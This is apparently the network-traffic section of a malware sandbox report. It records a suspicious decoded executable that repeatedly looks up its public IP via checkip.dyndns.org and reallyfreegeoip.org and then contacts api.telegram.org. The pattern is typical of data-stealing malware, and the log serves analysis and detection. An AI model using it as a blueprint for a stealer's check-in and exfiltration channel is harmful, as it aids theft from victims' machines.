Sep 27, 2024 10:47:31.175031900 CEST | 49699 | 80 | 192.168.2.7 | 158.101.44.242
Sep 27, 2024 10:47:31.637057066 CEST | 443 | 49701 | 188.114.97.3 | 192.168.2.7
Sep 27, 2024 10:47:31.639826059 CEST | 49701 | 443 | 192.168.2.7 | 188.114.97.3
Sep 27, 2024 10:47:31.639852047 CEST | 443 | 49701 | 188.114.97.3 | 192.168.2.7
Sep 27, 2024 10:47:31.786241055 CEST | 443 | 49701 | 188.114.97.3 | 192.168.2.7
Sep 27, 2024 10:47:31.786345959 CEST | 443 | 49701 | 188.114.97.3 | 192.168.2.7
Sep 27, 2024 10:47:31.786427975 CEST | 49701 | 443 | 192.168.2.7 | 188.114.97.3
Sep 27, 2024 10:47:31.786958933 CEST | 49701 | 443 | 192.168.2.7 | 188.114.97.3
Sep 27, 2024 10:47:31.790143013 CEST | 49699 | 80 | 192.168.2.7 | 158.101.44.242
Sep 27, 2024 10:47:31.791419029 CEST | 49702 | 80 | 192.168.2.7 | 158.101.44.242
Sep 27, 2024 10:47:31.795178890 CEST | 80 | 49699 | 158.101.44.242 | 192.168.2.7
Sep 27, 2024 10:47:31.795254946 CEST | 49699 | 80 | 192.168.2.7 | 158.101.44.242
Sep 27, 2024 10:47:31.796174049 CEST | 80 | 49702 | 158.101.44.242 | 192.168.2.7
Sep 27, 2024 10:47:31.796246052 CEST | 49702 | 80 | 192.168.2.7 | 158.101.44.242
Sep 27, 2024 10:47:31.796327114 CEST | 49702 | 80 | 192.168.2.7 | 158.101.44.242
Sep 27, 2024 10:47:31.801064014 CEST | 80 | 49702 | 158.101.44.242 | 192.168.2.7
Sep 27, 2024 10:47:32.371851921 CEST | 80 | 49702 | 158.101.44.242 | 192.168.2.7
Sep 27, 2024 10:47:32.373430014 CEST | 49703 | 443 | 192.168.2.7 | 188.114.97.3
Sep 27, 2024 10:47:32.373490095 CEST | 443 | 49703 | 188.114.97.3 | 192.168.2.7
Sep 27, 2024 10:47:32.373590946 CEST | 49703 | 443 | 192.168.2.7 | 188.114.97.3
Sep 27, 2024 10:47:32.374156952 CEST | 49703 | 443 | 192.168.2.7 | 188.114.97.3
Sep 27, 2024 10:47:32.374170065 CEST | 443 | 49703 | 188.114.97.3 | 192.168.2.7
Sep 27, 2024 10:47:32.424998999 CEST | 49702 | 80 | 192.168.2.7 | 158.101.44.242
Sep 27, 2024 10:47:32.828816891 CEST | 443 | 49703 | 188.114.97.3 | 192.168.2.7
Sep 27, 2024 10:47:32.830460072 CEST | 49703 | 443 | 192.168.2.7 | 188.114.97.3
Sep 27, 2024 10:47:32.830507040 CEST | 443 | 49703 | 188.114.97.3 | 192.168.2.7
Sep 27, 2024 10:47:32.974735022 CEST | 443 | 49703 | 188.114.97.3 | 192.168.2.7
Sep 27, 2024 10:47:32.974839926 CEST | 443 | 49703 | 188.114.97.3 | 192.168.2.7
                                                                                  Sep 27, 2024 10:47:32.975406885 CEST49703443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:32.975406885 CEST49703443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:32.986876965 CEST4970480192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:32.991719961 CEST8049704158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:32.991813898 CEST4970480192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:32.991928101 CEST4970480192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:32.996674061 CEST8049704158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:33.550592899 CEST8049704158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:33.572843075 CEST49705443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:33.572876930 CEST44349705188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:33.572962999 CEST49705443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:33.573266983 CEST49705443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:33.573282003 CEST44349705188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:33.596935034 CEST4970480192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:34.026843071 CEST44349705188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:34.028311014 CEST49705443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:34.028331041 CEST44349705188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:34.175647020 CEST44349705188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:34.175740957 CEST44349705188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:34.175826073 CEST49705443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:34.176317930 CEST49705443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:34.180111885 CEST4970480192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:34.181030989 CEST4970680192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:34.185777903 CEST8049704158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:34.185805082 CEST8049706158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:34.185837984 CEST4970480192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:34.185878992 CEST4970680192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:34.186002016 CEST4970680192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:34.190718889 CEST8049706158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:34.808716059 CEST8049706158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:34.810134888 CEST49707443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:34.810172081 CEST44349707188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:34.810710907 CEST49707443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:34.810878992 CEST49707443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:34.810890913 CEST44349707188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:34.862544060 CEST4970680192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:35.264621973 CEST44349707188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:35.266185999 CEST49707443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:35.266206980 CEST44349707188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:35.396303892 CEST44349707188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:35.396394014 CEST44349707188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:35.396725893 CEST49707443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:35.398876905 CEST49707443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:35.400235891 CEST4970680192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:35.402873039 CEST4970880192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:35.405550957 CEST8049706158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:35.405693054 CEST4970680192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:35.407744884 CEST8049708158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:35.408276081 CEST4970880192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:35.408276081 CEST4970880192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:35.413117886 CEST8049708158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:35.977077961 CEST8049708158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:35.980223894 CEST49709443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:35.980320930 CEST44349709188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:35.980437994 CEST49709443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:35.980648994 CEST49709443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:35.980703115 CEST44349709188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:36.018847942 CEST4970880192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:36.462778091 CEST44349709188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:36.464505911 CEST49709443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:36.464567900 CEST44349709188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:36.605624914 CEST44349709188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:36.605731964 CEST44349709188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:36.605878115 CEST49709443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:36.606385946 CEST49709443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:36.610336065 CEST4970880192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:36.611804962 CEST4971080192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:36.615848064 CEST8049708158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:36.615930080 CEST4970880192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:36.616642952 CEST8049710158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:36.616760015 CEST4971080192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:36.616889000 CEST4971080192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:36.621675968 CEST8049710158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:37.193453074 CEST8049710158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:37.194915056 CEST49711443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:37.194961071 CEST44349711188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:37.195056915 CEST49711443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:37.195342064 CEST49711443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:37.195353985 CEST44349711188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:37.237560034 CEST4971080192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:37.651527882 CEST44349711188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:37.653767109 CEST49711443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:37.653790951 CEST44349711188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:37.809432983 CEST44349711188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:37.809535980 CEST44349711188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:37.809735060 CEST49711443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:37.813569069 CEST49711443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:37.817173004 CEST4971080192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:37.818133116 CEST4971280192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:37.822211981 CEST8049710158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:37.822298050 CEST4971080192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:37.822922945 CEST8049712158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:37.822981119 CEST4971280192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:37.823101044 CEST4971280192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:37.827879906 CEST8049712158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:38.380419970 CEST8049712158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:38.381710052 CEST49713443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:38.381761074 CEST44349713188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:38.381846905 CEST49713443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:38.382083893 CEST49713443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:38.382101059 CEST44349713188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:38.425038099 CEST4971280192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:38.848473072 CEST44349713188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:38.850053072 CEST49713443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:38.850075006 CEST44349713188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:38.978490114 CEST44349713188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:38.978576899 CEST44349713188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:38.978744030 CEST49713443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:38.979319096 CEST49713443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:38.982295036 CEST4971280192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:38.983707905 CEST4971480192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:38.987600088 CEST8049712158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:38.987685919 CEST4971280192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:38.988531113 CEST8049714158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:38.988617897 CEST4971480192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:38.988795996 CEST4971480192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:38.993808031 CEST8049714158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:39.775293112 CEST8049714158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:39.776839972 CEST49715443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:39.776890039 CEST44349715188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:39.776989937 CEST49715443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:39.777273893 CEST49715443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:39.777287006 CEST44349715188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:39.787242889 CEST8049714158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:39.787352085 CEST4971480192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:40.241466045 CEST44349715188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:40.243092060 CEST49715443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:40.243129015 CEST44349715188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:40.382785082 CEST44349715188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:40.382885933 CEST44349715188.114.97.3192.168.2.7
                                                                                  Sep 27, 2024 10:47:40.382958889 CEST49715443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:40.383538961 CEST49715443192.168.2.7188.114.97.3
                                                                                  Sep 27, 2024 10:47:40.408776045 CEST4971480192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:40.414033890 CEST8049714158.101.44.242192.168.2.7
                                                                                  Sep 27, 2024 10:47:40.414115906 CEST4971480192.168.2.7158.101.44.242
                                                                                  Sep 27, 2024 10:47:40.417251110 CEST49716443192.168.2.7149.154.167.220
                                                                                  Sep 27, 2024 10:47:40.417285919 CEST44349716149.154.167.220192.168.2.7
                                                                                  Sep 27, 2024 10:47:40.417619944 CEST49716443192.168.2.7149.154.167.220
                                                                                  Sep 27, 2024 10:47:40.417764902 CEST49716443192.168.2.7149.154.167.220
                                                                                  Sep 27, 2024 10:47:40.417778969 CEST44349716149.154.167.220192.168.2.7
                                                                                  Sep 27, 2024 10:47:41.044646025 CEST44349716149.154.167.220192.168.2.7
                                                                                  Sep 27, 2024 10:47:41.044835091 CEST49716443192.168.2.7149.154.167.220
                                                                                  Sep 27, 2024 10:47:41.048450947 CEST49716443192.168.2.7149.154.167.220
                                                                                  Sep 27, 2024 10:47:41.048461914 CEST44349716149.154.167.220192.168.2.7
                                                                                  Sep 27, 2024 10:47:41.048892021 CEST44349716149.154.167.220192.168.2.7
                                                                                  Sep 27, 2024 10:47:41.050518990 CEST49716443192.168.2.7149.154.167.220
                                                                                  Sep 27, 2024 10:47:41.091401100 CEST44349716149.154.167.220192.168.2.7
                                                                                  Sep 27, 2024 10:47:41.347111940 CEST44349716149.154.167.220192.168.2.7
                                                                                  Sep 27, 2024 10:47:41.347197056 CEST44349716149.154.167.220192.168.2.7
                                                                                  Sep 27, 2024 10:47:41.347388029 CEST49716443192.168.2.7149.154.167.220
                                                                                  Sep 27, 2024 10:47:41.366692066 CEST49716443192.168.2.7149.154.167.220
                                                                                  Sep 27, 2024 10:47:41.799312115 CEST4970280192.168.2.7158.101.44.242
Timestamp  Source Port  Dest Port  Source IP  Dest IP
Sep 27, 2024 10:47:29.275546074 CEST  53708  53  192.168.2.7  1.1.1.1
Sep 27, 2024 10:47:29.283811092 CEST  53  53708  1.1.1.1  192.168.2.7
Sep 27, 2024 10:47:30.127849102 CEST  49722  53  192.168.2.7  1.1.1.1
Sep 27, 2024 10:47:30.136090040 CEST  53  49722  1.1.1.1  192.168.2.7
Sep 27, 2024 10:47:40.409476995 CEST  55169  53  192.168.2.7  1.1.1.1
Sep 27, 2024 10:47:40.416456938 CEST  53  55169  1.1.1.1  192.168.2.7
Timestamp  Source IP  Dest IP  Trans ID  OP Code  Name  Type  Class  DNS over HTTPS
Sep 27, 2024 10:47:29.275546074 CEST  192.168.2.7  1.1.1.1  0xb14  Standard query (0)  checkip.dyndns.org  A (IP address)  IN (0x0001)  false
Sep 27, 2024 10:47:30.127849102 CEST  192.168.2.7  1.1.1.1  0x7ded  Standard query (0)  reallyfreegeoip.org  A (IP address)  IN (0x0001)  false
Sep 27, 2024 10:47:40.409476995 CEST  192.168.2.7  1.1.1.1  0xb10d  Standard query (0)  api.telegram.org  A (IP address)  IN (0x0001)  false
Timestamp  Source IP  Dest IP  Trans ID  Reply Code  Name  CName  Address  Type  Class  DNS over HTTPS
Sep 27, 2024 10:47:29.283811092 CEST  1.1.1.1  192.168.2.7  0xb14  No error (0)  checkip.dyndns.org  checkip.dyndns.com  -  CNAME (Canonical name)  IN (0x0001)  false
Sep 27, 2024 10:47:29.283811092 CEST  1.1.1.1  192.168.2.7  0xb14  No error (0)  checkip.dyndns.com  -  158.101.44.242  A (IP address)  IN (0x0001)  false
Sep 27, 2024 10:47:29.283811092 CEST  1.1.1.1  192.168.2.7  0xb14  No error (0)  checkip.dyndns.com  -  132.226.8.169  A (IP address)  IN (0x0001)  false
Sep 27, 2024 10:47:29.283811092 CEST  1.1.1.1  192.168.2.7  0xb14  No error (0)  checkip.dyndns.com  -  193.122.6.168  A (IP address)  IN (0x0001)  false
Sep 27, 2024 10:47:29.283811092 CEST  1.1.1.1  192.168.2.7  0xb14  No error (0)  checkip.dyndns.com  -  193.122.130.0  A (IP address)  IN (0x0001)  false
Sep 27, 2024 10:47:29.283811092 CEST  1.1.1.1  192.168.2.7  0xb14  No error (0)  checkip.dyndns.com  -  132.226.247.73  A (IP address)  IN (0x0001)  false
Sep 27, 2024 10:47:30.136090040 CEST  1.1.1.1  192.168.2.7  0x7ded  No error (0)  reallyfreegeoip.org  -  188.114.97.3  A (IP address)  IN (0x0001)  false
Sep 27, 2024 10:47:30.136090040 CEST  1.1.1.1  192.168.2.7  0x7ded  No error (0)  reallyfreegeoip.org  -  188.114.96.3  A (IP address)  IN (0x0001)  false
Sep 27, 2024 10:47:40.416456938 CEST  1.1.1.1  192.168.2.7  0xb10d  No error (0)  api.telegram.org  -  149.154.167.220  A (IP address)  IN (0x0001)  false
• reallyfreegeoip.org
• api.telegram.org
• checkip.dyndns.org
Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
0  192.168.2.7  49699  158.101.44.242  80  6764  C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
Timestamp  Bytes transferred  Direction  Data
Sep 27, 2024 10:47:29.294574976 CEST  151  OUT  GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Sep 27, 2024 10:47:29.910844088 CEST  320  IN  HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 08:47:29 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 6a9deef42de469b531c6dfe3d44a6b5d
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 27, 2024 10:47:29.915019035 CEST  127  OUT  GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Sep 27, 2024 10:47:30.066852093 CEST  320  IN  HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 08:47:29 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 8730ca0b1e733c87e5a505006018a6f7
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 27, 2024 10:47:30.931173086 CEST  127  OUT  GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
                                                                                  Sep 27, 2024 10:47:31.133038044 CEST320INHTTP/1.1 200 OK
                                                                                  Date: Fri, 27 Sep 2024 08:47:31 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: fc91bcc42d7f35effdf1308bec7b934d
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49702 | 158.101.44.242 | 80 | 6764 | C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 10:47:31.796327114 CEST | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Sep 27, 2024 10:47:32.371851921 CEST | 320 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 08:47:32 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: d36db8745c10794edefc0a0a6e1b3f7e
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49704 | 158.101.44.242 | 80 | 6764 | C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 10:47:32.991928101 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Sep 27, 2024 10:47:33.550592899 CEST | 320 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 08:47:33 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 08577ac9fa9b2121996618eb1dd8dd5d
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49706 | 158.101.44.242 | 80 | 6764 | C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 10:47:34.186002016 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Sep 27, 2024 10:47:34.808716059 CEST | 320 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 08:47:34 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: c23ba3683a991ca425247fd9def26ff0
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 49708 | 158.101.44.242 | 80 | 6764 | C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 10:47:35.408276081 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Sep 27, 2024 10:47:35.977077961 CEST | 320 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 08:47:35 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 25a93a6025ac486d61b111efe7f4ac04
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
